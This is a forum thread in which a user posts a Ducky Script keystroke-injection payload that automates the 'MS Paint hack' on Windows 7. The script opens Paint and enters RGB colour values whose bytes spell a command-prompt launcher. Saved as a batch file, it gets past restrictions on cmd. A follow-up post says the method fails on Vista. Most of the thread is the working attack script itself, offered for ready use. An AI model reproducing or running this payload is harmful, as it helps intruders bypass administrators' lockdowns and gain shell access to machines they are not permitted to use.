overwraith Posted October 27, 2012 Share Posted October 27, 2012 (edited) The following is some duck script I made for easily setting up the MS Paint hack from way back in episode 925. Machines secured correctly with group policies are not susceptible to this attack. You are still required to save the file correctly, and input the colors in the correct order, but they should already be in the correct order in the custom color box. This particular variant only works on Windows 7, but could be easily modified for Vista. REM MSPAINT hack revealed by "Operator" CONTROL ESCAPE DELAY 200 STRING mspaint ENTER DELAY 1000 CTRL E STRING 6 TAB STRING 1 Enter CTRL PAGEUP REPEAT 5 REM ****FIRST COLOR**** ALT H STRING EC ALT R STRING 10 TAB STRING 0 TAB STRING 0 ENTER REM ****SECOND COLOR**** ALT H STRING EC ALT R STRING 13 TAB STRING 10 TAB STRING 13 ENTER REM ****THIRD COLOR**** ALT H STRING EC ALT R STRING 100 TAB STRING 109 TAB STRING 99 ENTER REM ****FOURTH COLOR**** ALT H STRING EC ALT R STRING 120 TAB STRING 101 TAB STRING 46 ENTER REM ****FIFTH COLOR**** ALT H STRING EC ALT R STRING 0 TAB STRING 0 TAB STRING 101 ENTER REM ****SIXTH COLOR**** ALT H STRING EC ALT R STRING 0 TAB STRING 0 TAB STRING 0 ENTER Edited February 6, 2013 by midnitesnake corrected formatting Quote Link to comment Share on other sites More sharing options...
overwraith Posted October 28, 2012 Author Share Posted October 28, 2012 Unfortunately in windows vista MS paint is a little bit different. The custom color picker selects a seemingly random color slot after you input the first couple of colors. It seems unfeasible to create a duck script for this action on vista. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.